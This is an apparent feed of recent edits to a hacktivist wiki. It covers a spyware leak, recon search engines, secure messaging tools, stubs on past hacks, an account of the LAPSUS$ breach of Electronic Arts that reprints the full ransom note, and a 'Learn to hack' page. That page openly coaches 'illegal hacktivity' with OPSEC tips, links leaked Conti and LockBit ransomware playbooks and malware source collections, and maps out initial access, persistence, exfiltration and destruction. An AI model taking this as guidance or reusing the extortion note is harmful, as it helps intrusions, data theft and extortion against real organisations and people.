&lt;div&gt;150,000 files from the spyware reseller WebDetetive, a phone monitoring app typically installed on phones without the user&#039;s consent (or even knowledge). The software uploads the contents of the user&#039;s phone to its servers, messages, call logs, phone call recordings, photos, ambient recordings from the phone’s microphone and GPS data.&lt;br /&gt;
&lt;br /&gt;
The data does not include include files from the victims&#039; devices. WebDetetive does not verify customer email addresses when signing up.&lt;br /&gt;
&lt;br /&gt;
== Media Coverage ==&lt;br /&gt;
# https://ddosecrets.com/wiki/WebDetetive&lt;br /&gt;
# https://techcrunch.com/2023/08/26/brazil-webdetetive-spyware-deleted/&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Search_Engines_Resources&amp;diff=1700</id>
		<title>Search Engines Resources</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Search_Engines_Resources&amp;diff=1700"/>
		<updated>2023-11-16T23:04:26Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: /* Web */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Search Engines ==&lt;br /&gt;
The following search engines can be used as part of your passive recon. They are good for searching through code repositories, passive port scanning and technology analysis and looking for CVEs and exploits. To make use of their fullest potential they often require payments. Remember to conduct good OPSEC when placing any purchases with services that you&#039;re going to use in your hacktivist operations!&lt;br /&gt;
&lt;br /&gt;
Many of these search engines allow the use of an API. You can integrate their API&#039;s with some of your automated tooling.&lt;br /&gt;
&lt;br /&gt;
=== Web ===&lt;br /&gt;
* https://www.google.com&lt;br /&gt;
* https://duckduckgo.com&lt;br /&gt;
* https://www.bing.com&lt;br /&gt;
* https://yandex.com&lt;br /&gt;
* https://metager.de/&lt;br /&gt;
* https://searxng.nicfab.eu/&lt;br /&gt;
* https://search.carrot2.org/#/search/web&lt;br /&gt;
* https://github.com&lt;br /&gt;
** https://github.com/gwen001/github-subdomains&lt;br /&gt;
*** https://github.com/gwen001/github-endpoints&lt;br /&gt;
**** https://github.com/gwen001/github-regexp&lt;br /&gt;
&lt;br /&gt;
=== Code repository search ===&lt;br /&gt;
* https://grep.app&lt;br /&gt;
* https://searchcode.com&lt;br /&gt;
&lt;br /&gt;
=== Exploit/CVE search ===&lt;br /&gt;
* https://www.exploit-db.com&lt;br /&gt;
* https://www.rapid7.com/db&lt;br /&gt;
* https://sploitus.com&lt;br /&gt;
* https://www.exploitalert.com/search-results.html&lt;br /&gt;
* https://vulmon.com&lt;br /&gt;
* https://www.cisa.gov/known-exploited-vulnerabilities-catalog&lt;br /&gt;
* https://vulners.com [Free &amp;amp; Paid]&lt;br /&gt;
* Nuclei template search engine: https://nuclei-templates.netlify.app&lt;br /&gt;
&lt;br /&gt;
=== Internet of things search ===&lt;br /&gt;
* https://www.shodan.io [Free &amp;amp; Paid]&lt;br /&gt;
* https://www.zoomeye.org [Free &amp;amp; Paid]&lt;br /&gt;
* https://search.censys.io [Free &amp;amp; Paid]&lt;br /&gt;
* https://dnsdumpster.com&lt;br /&gt;
* https://urlscan.io [Free &amp;amp; Paid]&lt;br /&gt;
* https://ivre.rocks&lt;br /&gt;
* https://fullhunt.io [Free &amp;amp; Paid]&lt;br /&gt;
* https://pulsedive.com [Free &amp;amp; Paid]&lt;br /&gt;
* https://wigle.net&lt;br /&gt;
* https://crt.sh&lt;br /&gt;
* https://publicwww.com [Free &amp;amp; Paid]&lt;br /&gt;
* https://viz.greynoise.io [Free &amp;amp; Paid]&lt;br /&gt;
* https://tls.bufferover.run [Free &amp;amp; Paid]&lt;br /&gt;
* https://www.whois.com/whois&lt;br /&gt;
* Passively enumerate subdomains: https://subdomainfinder.c99.nl&lt;br /&gt;
* https://host.io [Free &amp;amp; Paid]&lt;br /&gt;
* https://viewdns.info&lt;br /&gt;
* https://hackertarget.com [Free &amp;amp; Paid]&lt;br /&gt;
* Internet analysis: https://bgp.he.net&lt;br /&gt;
* https://check-host.net&lt;br /&gt;
* https://whois.whoisxmlapi.com [Free &amp;amp; Paid]&lt;br /&gt;
* https://www.whoxy.com [Free &amp;amp; Paid]&lt;br /&gt;
* https://viewdns.info&lt;br /&gt;
&lt;br /&gt;
=== Business email search ===&lt;br /&gt;
* https://hunter.io [Paid]&lt;br /&gt;
* https://rocketreach.co [Paid]&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Secure_Messaging_Applications&amp;diff=1699</id>
		<title>Secure Messaging Applications</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Secure_Messaging_Applications&amp;diff=1699"/>
		<updated>2023-11-16T21:13:36Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: updated&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Recommended Applications ==&lt;br /&gt;
&lt;br /&gt;
* [https://element.io/ Element/Matrix] A secure communications platform built around you.&lt;br /&gt;
* [https://xmpp.org/ XMPP] The universal messaging standard.&lt;br /&gt;
* [https://onionshare.org Onionshare] Privacy + Productivity.&lt;br /&gt;
* [https://tox.chat/ Tox] A New Kind of Instant Messaging.&lt;br /&gt;
* [https://briarproject.org/ Briar] Secure messaging, anywhere.&lt;br /&gt;
* [https://signal.org/ Signal] Speak Freely.&lt;br /&gt;
* [https://cwtch.im Cwtch] Surveillance resistant infrastructure. ([http://cwtchim3z2gdsyb27acfc26lup5aqbegjrjsqulzrnkuoalq5h4gmcid.onion Tor])&lt;br /&gt;
* [https://getsession.org/ Session Messenger] Send messages, not metadata.&lt;br /&gt;
* [https://www.thunderbird.net Thunderbird] A e-mail client with built-in support for [https://support.mozilla.org/en-US/kb/openpgp-thunderbird-howto-and-faq PGP encryption].&lt;br /&gt;
* Probably the most mature XMPP client with a focus on security and privacy is [https://coy.im/ CoyIM] | [https://github.com/coyim/coyim GitHub] ([http://qvt3o2ipzxx3gtoyafd3ptqwsxjs52enlwlxuryn2xjkm7hnp5icd6yd.onion Tor])&lt;br /&gt;
&lt;br /&gt;
== Operating Systems ==&lt;br /&gt;
* [https://www.qubes-os.org/ Qubes OS] A reasonably secure operating system.&lt;br /&gt;
* [https://www.whonix.org/ Whonix] Superior Internet Privacy.&lt;br /&gt;
* [https://tails.net Tails] a portable operating system that protects against surveillance and censorship.&lt;br /&gt;
&lt;br /&gt;
== E-mail Services ==&lt;br /&gt;
* [https://disroot.org/en Disroot] Disroot is a platform providing online services based on principles of freedom, privacy, federation and decentralization.&lt;br /&gt;
* [https://proton.me/mail Protonmail] Secure email that protects your privacy.&lt;br /&gt;
* [https://tuta.com/ Tuta] Secure, green and ad-free. Email to feel good about.&lt;br /&gt;
&lt;br /&gt;
== Guides ==&lt;br /&gt;
* [https://anonymousplanet.org/ The Hitchhiker’s Guide to Online Anonymity] | [http://thgtoa27ujspeqxasrfvcf5aozqdczvgmwgorrmblh6jn4nino3spcqd.onion/ Tor].&lt;br /&gt;
* [https://privacy.awiki.org/ The Privacy Raccoon] Digital self-defense against mass surveillance.&lt;br /&gt;
* [https://www.whonix.org/wiki/Tips_on_Remaining_Anonymous Tips on Remaining Anonymous] Whonix Wiki.&lt;br /&gt;
* [https://www.eff.org/pages/surveillance-self-defense Surveillance Self-Defense] (EFF).&lt;br /&gt;
* [https://s0cm0nkey.gitbook.io/s0cm0nkeys-security-reference-guide/grey-privacy-tor-opsec s0cm0nkey&#039;s Security Reference Guide].&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=CorruptBrazil&amp;diff=1698</id>
		<title>CorruptBrazil</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=CorruptBrazil&amp;diff=1698"/>
		<updated>2023-11-16T20:57:17Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: improviment&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;A cache of evidence revealing government coverup of a corruption investigation involving the CIA, the Brazilian telecom industry, and multiple US corporations.&lt;br /&gt;
&lt;br /&gt;
== Files ==&lt;br /&gt;
[[File:CorruptBrazil_release-statement.txt]]&lt;br /&gt;
&lt;br /&gt;
== Dataset/ddosecrets ==&lt;br /&gt;
* [https://www.ddosecrets.com/wiki/CorruptBrazil CorruptBrazil at Distributed Denial of Secrets]&lt;br /&gt;
&lt;br /&gt;
[[Category:Hacks]] [[Category:Stub pages]]&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Fuck_FBI_Friday&amp;diff=1697</id>
		<title>Fuck FBI Friday</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Fuck_FBI_Friday&amp;diff=1697"/>
		<updated>2023-11-16T20:53:38Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: improviment&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;FFF (Fuck FBI Friday) was a series of hacks against the Federal Bureau of Investigation, law enforcement agencies, and contractors by Anonymous-affiliated group Lulzsec/Antisec.&lt;br /&gt;
&lt;br /&gt;
== Files ==&lt;br /&gt;
[[File:Fuckfbifriday_teaser.txt]]&amp;lt;br&amp;gt;&lt;br /&gt;
[[File:NwN8ehFW.txt]]&amp;lt;br&amp;gt;&lt;br /&gt;
[[File:FFF_-_lcso.org_Edition.txt]]&amp;lt;br&amp;gt;&lt;br /&gt;
[[File:PRETENTIOUS_PRESS_STATEMENT.txt]]&amp;lt;br&amp;gt;&lt;br /&gt;
[[File:Antisec_Fuck_FBI_Friday_V_IACIS_Cybercrime_Investigators.txt]]&lt;br /&gt;
&lt;br /&gt;
== Dataset/ddosecrets ==&lt;br /&gt;
[https://ddosecrets.com/wiki/Fuck_FBI_Friday Fuck FBI friday at Distributed Denial of Secrets]&lt;br /&gt;
&lt;br /&gt;
[[Category:Hacks]] [[Category:Stub pages]]&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Electronic_Arts&amp;diff=1696</id>
		<title>Electronic Arts</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Electronic_Arts&amp;diff=1696"/>
		<updated>2023-11-16T20:30:18Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: minor fix&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Hack of the video game company Electronics Arts exposing 780GB of data including source code for the company&#039;s Frostbite engine, by LAPSUS$.&lt;br /&gt;
&lt;br /&gt;
[https://www.vice.com/en/article/wx5xpx/hackers-steal-data-electronic-arts-ea-fifa-source-code Vice: Hackers Steal Wealth of Data from Game Giant EA]&lt;br /&gt;
&lt;br /&gt;
== Explanation of the Hack ==&lt;br /&gt;
&lt;br /&gt;
The hackers bought a cookie that let them log into an EA Slack account on Genesis Market, a marketplace for credentials stolen from computers infected with malware. The hackers then tricked an IT employee into granting them access to the company&#039;s internal network.&lt;br /&gt;
&lt;br /&gt;
* [https://www.vice.com/en/article/7kvkqb/how-ea-games-was-hacked-slack Vice: How Hackers Used Slack to Break into EA Games]&lt;br /&gt;
* [https://www.vice.com/en/article/n7b3jm/genesis-market-buy-cookies-slack Vice: Inside the Market for Cookies That Lets Hackers Pretend to Be You]&lt;br /&gt;
&lt;br /&gt;
The hackers first tried to sell the access and source code on Raidforums. The Raidforums members got the hackers in touch with a Vice journalist who interviewed them and broke news of the hack to EA. The hackers then tried to solicit said journalist to pass along an extortion message to EA. Unfortunately, the journalist refused. The hackers proceeded to blackmail the company for $100m not to release the data and Vice was then able to confirm that EA had indeed received their message. EA does not seem to have paid as the hackers have subsequently released all the data for free.&lt;br /&gt;
&lt;br /&gt;
[https://www.vice.com/en/article/m7e57n/hackers-extort-ea-fifa Vice: Hackers Move to Extort Gaming Giant EA]&lt;br /&gt;
&lt;br /&gt;
== Ransom note ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hello EA&lt;br /&gt;
&lt;br /&gt;
we are the Hackers who breached your src and other data&lt;br /&gt;
First of all we apologize to harm your company and reputation&lt;br /&gt;
well what is the motive behind any hack Money right ?&lt;br /&gt;
so we are here to discuss related to this thing&lt;br /&gt;
we checked your statement on media where you mentioned &amp;quot;&amp;quot;No player data was accessed, and we have no reason to believe there is any risk to player privacy,&lt;br /&gt;
Is this really true? We, in fact, got to some of your production database we have database (around 2TB of pure data)&lt;br /&gt;
As you already know&lt;br /&gt;
we have src , tools + unrevealed 2tb pure data&lt;br /&gt;
with respect you also know if we leak this it can be big trouble for your company&lt;br /&gt;
that&#039;s why i have a idea best offer to you&lt;br /&gt;
we never sell your data to anyone&lt;br /&gt;
only my team have this data if we want to kept his all private we can&lt;br /&gt;
the deal is Pay us 100 mil$ in xmr (monero)&lt;br /&gt;
we will never disclose your any type of data in public even we take full responsibility it will never leak and it will deleted from our system too&lt;br /&gt;
You have 7 days for paying us first 33.34 mil$ to the first address&lt;br /&gt;
After 8 th day we will contact news to tell them we have user data.&lt;br /&gt;
After the 9th day we will start to post some part of your source code every day on the deepweb til the first payment is completed.&lt;br /&gt;
we gave you the best offer if you pay in delay, everything will be deleted and your company can run,&lt;br /&gt;
&lt;br /&gt;
We have no interest in leaking if you pay. I know this sound like a ransomware, but just for one time, trust us. We just want money&lt;br /&gt;
&lt;br /&gt;
we know your are afraid of scammers&lt;br /&gt;
we sending you here our proof ofdata for your trust&lt;br /&gt;
&lt;br /&gt;
So, how&#039;s that we gonna proceed,&lt;br /&gt;
You will maintenance your fifa 21 servers the 5th of july at any time,&lt;br /&gt;
Before the maintenance, you will post a message on your twitter account (@EA)&lt;br /&gt;
After the first payment completed, you will have 2weeks to send the other 66.66mil USD&lt;br /&gt;
&lt;br /&gt;
Data : USER_EVENT_SESSION_ENGA... Rows : 348.0G Size : 30.3TB&lt;br /&gt;
USER_EVENT_ECONOMY Rows : 108.5G Size : 11.4TB&lt;br /&gt;
USER_EVENT_MESSAGING Rows : 190.9G Size : 11.2TB&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
I really hope you understand that we are not kidding and we are friendly.&lt;br /&gt;
Thoses addresses are one time payment, mean you can&#039;t send two time to an address.&lt;br /&gt;
&lt;br /&gt;
so here is out payment address&lt;br /&gt;
&lt;br /&gt;
XMR :&lt;br /&gt;
&lt;br /&gt;
again we are sorry but you know during this pandemic we all need money , just all people ways are different&lt;br /&gt;
&lt;br /&gt;
i hope you will send the first payment in less than 7 days so we can continue&lt;br /&gt;
&lt;br /&gt;
Instruction : Well for our own reasons we don&#039;t use any direct contact with you&lt;br /&gt;
&lt;br /&gt;
we will use indirect contact method&lt;br /&gt;
So, I will give you some written content which you will post from your Twitter account so that we can understand.&lt;br /&gt;
if you are ready and make payment with the address&lt;br /&gt;
post on your twitter account : &amp;quot;maintenance from 5 July 10 to 11 UTC&lt;br /&gt;
&lt;br /&gt;
If you posted this we will understand you are ready to make the payment and we will proceed&lt;br /&gt;
&lt;br /&gt;
In Case you want to deny our golden offer&lt;br /&gt;
post :&lt;br /&gt;
or if you need some more time post &amp;quot;just report this to any reporter and made news again we so we understand you deny our offer and we will start to posting our code and start selling other sensitive data&amp;quot;&lt;br /&gt;
&lt;br /&gt;
in one line : if you agree do a maintenance 5th of july from 10 to 11 UTC AND POST ON TWITTER&lt;br /&gt;
We need 33.34 mil in this week after this We will recontact you in some times&lt;br /&gt;
&lt;br /&gt;
When the first payment will be completed we will delete 50% of what we have&lt;br /&gt;
&lt;br /&gt;
On the third payment we will delete the database from our servers&lt;br /&gt;
&lt;br /&gt;
You will have 2 weeks to pay the others payment&lt;br /&gt;
&lt;br /&gt;
33.34 mil in this week after this We will recontact you in some times&lt;br /&gt;
&lt;br /&gt;
When the first payment will be completed we will delete 50% of what we have&lt;br /&gt;
&lt;br /&gt;
On the third payment we will delete the database from our servers&lt;br /&gt;
&lt;br /&gt;
You will have 2 weeks to pay the others payment&lt;br /&gt;
hope you will understand and pay us as fast as you can&lt;br /&gt;
&lt;br /&gt;
Last thing&lt;br /&gt;
If possible, do not tell this to the reporter and LE shits because we also do not want your reputation and worth to be down.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:Hacks]]&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Secure_Messaging_Applications&amp;diff=1695</id>
		<title>Secure Messaging Applications</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Secure_Messaging_Applications&amp;diff=1695"/>
		<updated>2023-11-16T20:25:53Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: updated list&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Recommended Applications ==&lt;br /&gt;
&lt;br /&gt;
* [https://tails.net Tails] comes with onionshare for file sharing, pidgin with OTR for encrypted chat, and thunderbird with GPG for encrypted email.&lt;br /&gt;
* [https://onionshare.org Onionshare] Privacy + Productivity. &lt;br /&gt;
* [https://element.io/ Element/Matrix] A secure communications platform built around you.&lt;br /&gt;
* [https://tox.chat/ Tox] A New Kind of Instant Messaging.&lt;br /&gt;
* [https://briarproject.org/ Briar] Secure messaging, anywhere.&lt;br /&gt;
* [https://signal.org/ Signal] Speak Freely.&lt;br /&gt;
* [https://cwtch.im Cwtch] Surveillance resistant infrastructure. ([http://cwtchim3z2gdsyb27acfc26lup5aqbegjrjsqulzrnkuoalq5h4gmcid.onion Tor])&lt;br /&gt;
* [https://getsession.org/ Session Messenger] Send messages, not metadata.&lt;br /&gt;
* [https://www.thunderbird.net Thunderbird] A e-mail client with built-in support for [https://support.mozilla.org/en-US/kb/openpgp-thunderbird-howto-and-faq PGP encryption].&lt;br /&gt;
* Probably the most mature XMPP client with a focus on security and privacy is [https://coy.im/ CoyIM] | [https://github.com/coyim/coyim GitHub] ([http://qvt3o2ipzxx3gtoyafd3ptqwsxjs52enlwlxuryn2xjkm7hnp5icd6yd.onion Tor])&lt;br /&gt;
&lt;br /&gt;
For a more detailed comparison of secure messaging software, see [https://www.whonix.org/wiki/Chat the Whonix Wiki].&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Secure_Messaging_Applications&amp;diff=1694</id>
		<title>Secure Messaging Applications</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Secure_Messaging_Applications&amp;diff=1694"/>
		<updated>2023-11-16T20:14:53Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: minor improviments&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Recommended Applications ==&lt;br /&gt;
&lt;br /&gt;
* [https://tails.net Tails] comes with onionshare for file sharing, pidgin with OTR for encrypted chat, and thunderbird with GPG for encrypted email&lt;br /&gt;
* Probably the most mature XMPP client with a focus on security and privacy is [https://coy.im/ CoyIM] | [https://github.com/coyim/coyim GitHub] ([http://qvt3o2ipzxx3gtoyafd3ptqwsxjs52enlwlxuryn2xjkm7hnp5icd6yd.onion Tor])&lt;br /&gt;
* https://cwtch.im ([http://cwtchim3z2gdsyb27acfc26lup5aqbegjrjsqulzrnkuoalq5h4gmcid.onion Tor])&lt;br /&gt;
* https://onionshare.org ([http://lldan5gahapx5k7iafb3s4ikijc4ni7gx5iywdflkba5y2ezyg6sjgyd.onion Tor])&lt;br /&gt;
* https://www.thunderbird.net A e-mail client with built-in support for [https://support.mozilla.org/en-US/kb/openpgp-thunderbird-howto-and-faq PGP encryption]&lt;br /&gt;
&lt;br /&gt;
For a more detailed comparison of secure messaging software, see [https://www.whonix.org/wiki/Chat the Whonix Wiki].&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=User:Mxwgn&amp;diff=1693</id>
		<title>User:Mxwgn</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=User:Mxwgn&amp;diff=1693"/>
		<updated>2023-11-16T20:11:22Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt; Hello.&lt;br /&gt;
&lt;br /&gt;
 E-MAIL: maxwell@disroot.org&lt;br /&gt;
 -&lt;br /&gt;
 FEDIVERSE: @maxwl@mastodon.social&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Learn_to_hack&amp;diff=1692</id>
		<title>Learn to hack</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Learn_to_hack&amp;diff=1692"/>
		<updated>2023-11-16T19:49:25Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: minor improviments&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page aims to compile high quality resources for hackers for both the experienced and inexperienced. All books listed on this page can be [https://libgen.lc found] on [https://libgen.fun/ Library Genesis].&lt;br /&gt;
&lt;br /&gt;
Make sure that you follow good OPSEC when carrying out your operations! See [https://enlacehacktivista.org/index.php?title=Learn_to_hack#Operational_security OPSEC]&lt;br /&gt;
&lt;br /&gt;
== General Resources ==&lt;br /&gt;
&lt;br /&gt;
Resources that assume little to no background knowledge:&lt;br /&gt;
* https://www.hoppersroppers.org/training.html&lt;br /&gt;
* https://tryhackme.com/&lt;br /&gt;
&lt;br /&gt;
Resources that assume minimal tech background:&lt;br /&gt;
* (book) Penetration Testing: A Hands-On Introduction to Hacking&lt;br /&gt;
* [https://web.archive.org/web/20230531145531/https://papers.vx-underground.org/papers/Malware%20Defense/Malware%20Analysis%202021/2021-08-31%20-%20Bassterlord%20%28FishEye%29%20Networking%20Manual%20%28X%29.pdf Bassterlord Networking Manual (translated)] (Focuses on [https://enlacehacktivista.org/index.php?title=Fortinet_SSL_VPN_Path_Traversal exploiting and hacking into networks via Forti SSL VPN])&lt;br /&gt;
* [https://web.archive.org/web/20230531144434if_/https://cdn-151.anonfiles.com/vcD868ubz5/08a9b897-1685544763/BasterLord+-+Network+manual+v2.0.pdf Bassterlord Networking Manual v2.0 (translated)] (Focuses on [[VPN brute forcing]])&lt;br /&gt;
* Translated: [https://web.archive.org/web/20230404175503if_/https://cdn-150.anonfiles.com/satbX2i8z2/75a3be58-1680631481/Conti_playbook_translated.pdf Conti playbook]&lt;br /&gt;
* LockBit 3.0 CobaltStrike: [https://web.archive.org/web/20230701141731if_/https://cdn-147.anonfiles.com/s1cbD0z3z3/4536e4f8-1688221595/LockBit-CobaltStrike.pdf LockBit 3.0 Guide]&lt;br /&gt;
&lt;br /&gt;
Resources that assume a tech or hacking background:&lt;br /&gt;
* (book) The Hacker Playbook 3&lt;br /&gt;
* [[Hack Back! A DIY Guide]]&lt;br /&gt;
* https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak&lt;br /&gt;
* [https://enlacehacktivista.org/images/8/8f/Flexispy.txt Flexispy Hack Back]&lt;br /&gt;
* [https://enlacehacktivista.org/libertycounsel.txt Liberty Counsel Hack Back]&lt;br /&gt;
* [https://youtu.be/kCLDqvDnGzA Catalan Police Union Hack Back]&lt;br /&gt;
* https://book.hacktricks.xyz&lt;br /&gt;
* [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T Pronico Hack Back]&lt;br /&gt;
* https://github.com/Correia-jpv/fucking-the-book-of-secret-knowledge&lt;br /&gt;
* https://github.com/0xPugazh/One-Liners&lt;br /&gt;
&lt;br /&gt;
The Bug Hunters Methodology:&lt;br /&gt;
* https://github.com/jhaddix/tbhm&lt;br /&gt;
* Application Analysis: https://youtu.be/FqnSAa2KmBI &lt;br /&gt;
* The Bug Hunter&#039;s Methodology v4.0: https://youtu.be/p4JgIu1mceI?si=jXcYksd4UqodZDBF&lt;br /&gt;
Practice labs:&lt;br /&gt;
* https://www.hackthebox.com&lt;br /&gt;
* https://academy.hackthebox.com&lt;br /&gt;
* https://www.pentesteracademy.com&lt;br /&gt;
* https://lab.pentestit.ru&lt;br /&gt;
* https://overthewire.org/wargames&lt;br /&gt;
&lt;br /&gt;
Appsec:&lt;br /&gt;
* https://github.com/paragonie/awesome-appsec&lt;br /&gt;
&lt;br /&gt;
Malware, a collection of malware source code and binaries:&lt;br /&gt;
* https://github.com/vxunderground/MalwareSourceCode&lt;br /&gt;
* https://github.com/ytisf/theZoo/tree/master/malware&lt;br /&gt;
&lt;br /&gt;
=== General references ===&lt;br /&gt;
&lt;br /&gt;
General resources you may find useful for learning. &lt;br /&gt;
&lt;br /&gt;
See [[General References]]&lt;br /&gt;
&lt;br /&gt;
[https://owasp.org/www-project-top-ten/ OWASP Top 10] is a broad consensus about the most critical security risks to web applications. See TryHackMe&#039;s [https://tryhackme.com/room/owasptop10 room] for practical OWASP Top 10 learning and their [https://tryhackme.com/room/owaspjuiceshop Juice Shop].&lt;br /&gt;
&lt;br /&gt;
== Recommended Reading - The Library ==&lt;br /&gt;
See recommended reading [https://libgen.fun books] that will aid you in your learning. See [[recommended reading in the library]]&lt;br /&gt;
&lt;br /&gt;
* [https://theanarchistlibrary.org/special/index The Anarchist Library] ([http://libraryqxxiqakubqv3dc2bend2koqsndbwox2johfywcatxie26bsad.onion/special/index Tor])&lt;br /&gt;
* Phrack: http://phrack.org&lt;br /&gt;
&lt;br /&gt;
== Operational security ==&lt;br /&gt;
&lt;br /&gt;
Operational security (OPSEC) is crucial for protecting oneself from surveillance and maintaining anonymity while conducting hacktivist operations.&lt;br /&gt;
&lt;br /&gt;
=== Recommended Measures ===&lt;br /&gt;
&lt;br /&gt;
Any illegal hacktivity should be done from an encrypted and separate computer or virtual machine, with all traffic router over Tor.&lt;br /&gt;
&lt;br /&gt;
For more information on recommended operational security measures, see [[Opsec Measures]]&lt;br /&gt;
&lt;br /&gt;
=== Secure Messaging ===&lt;br /&gt;
&lt;br /&gt;
Best practice for secure messaging includes proxying connections over Tor and using end-to-end encryption for messages.&lt;br /&gt;
&lt;br /&gt;
==== Recommended Applications ====&lt;br /&gt;
&lt;br /&gt;
For Jabber/XMPP, make sure to enable OTR or OMEMO encryption. For e-mail use PGP for encryption. For file sharing use onionshare.&lt;br /&gt;
&lt;br /&gt;
For more information on recommended applications, see [[Secure Messaging Applications]]&lt;br /&gt;
&lt;br /&gt;
== Initial Access ==&lt;br /&gt;
&lt;br /&gt;
There are many ways to gain [https://attack.mitre.org/tactics/TA0001/ initial access] into a targets network, from phishing, buying credential access, buying infected machines in corporate networks, password spraying, performing a targeted [https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets penetration test] and spray and pray scanning for vulnerabilities and hacking in. Here we list some resources in these regards.&lt;br /&gt;
&lt;br /&gt;
=== Common Initial Access TTPs ===&lt;br /&gt;
&lt;br /&gt;
For more information on gaining a foothold, see [[Initial Access Tactics, techniques and procedures]]&lt;br /&gt;
&lt;br /&gt;
=== Attacking Common Services ===&lt;br /&gt;
Your targets will likely use many services either externally or internally, this could be SSH, RDP, SMB, etc. It&#039;s important to know their common misconfigurations, attack vectors, their attack surface and how to hack these various protocols which may serve as the initial access vector. Here we cover various tools, techniques, common misconfigurations, tips and tricks and we cover both internal and external (publicly accessible) networks.&lt;br /&gt;
&lt;br /&gt;
See [[Common Service Attacks]]&lt;br /&gt;
&lt;br /&gt;
=== Scanning and Recon ===&lt;br /&gt;
&lt;br /&gt;
For [https://attack.mitre.org/tactics/TA0043 scanning and recon] tools, see [[Scanning and Recon]]. Make sure to make use of your tool&#039;s documentation and read the help menu (-hh/-h/--help).&lt;br /&gt;
&lt;br /&gt;
=== Search Engines ===&lt;br /&gt;
&lt;br /&gt;
Search engines are a useful tool for gathering information and intelligence from publicly available sources. Some are paid and some are free. Make sure to operate good OPSEC whenever placing a purchase for any service that will be used in your recon on a target.&lt;br /&gt;
&lt;br /&gt;
For more information on recommended search engines, see [[Search Engines Resources]]&lt;br /&gt;
&lt;br /&gt;
=== OSINT ===&lt;br /&gt;
&lt;br /&gt;
Open-source intelligence (OSINT) refers to the collection and analysis of information from publicly available sources.&lt;br /&gt;
&lt;br /&gt;
For more information on recommended tools and resources, see [[OSINT Tools and Resources]]&lt;br /&gt;
&lt;br /&gt;
== Persistence ==&lt;br /&gt;
Once you&#039;ve found a weakness in your targets infrastructure and have been able to gain [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures initial access] you&#039;ll want to keep it and avoid detection to maintain your access to your targets network for as long as possible.&lt;br /&gt;
&lt;br /&gt;
See [[Persistence]].&lt;br /&gt;
&lt;br /&gt;
== Post exploitation ==&lt;br /&gt;
&lt;br /&gt;
=== Windows ===&lt;br /&gt;
For Windows post exploitation, Active Directory and networking hacking, Lateral movement techniques, privilege escalation, defensive and offensive techniques:&lt;br /&gt;
&lt;br /&gt;
See [[Hacking Windows]]&lt;br /&gt;
&lt;br /&gt;
=== Linux ===&lt;br /&gt;
For performing Linux post exploitation, gaining persistence, evading detection, privilege escalation and more:&lt;br /&gt;
&lt;br /&gt;
See [[Hacking Linux]]&lt;br /&gt;
&lt;br /&gt;
== Exfiltration ==&lt;br /&gt;
One of the main objectives for a hacktivist is that of exfiltrating data, company secrets and if your motivations is that of revealing corruption then this step is of the most importance.&lt;br /&gt;
&lt;br /&gt;
See [[Data Exfiltration]] for techniques and methods for exfiltrating data out of your targets network.&lt;br /&gt;
&lt;br /&gt;
== Destruction ==&lt;br /&gt;
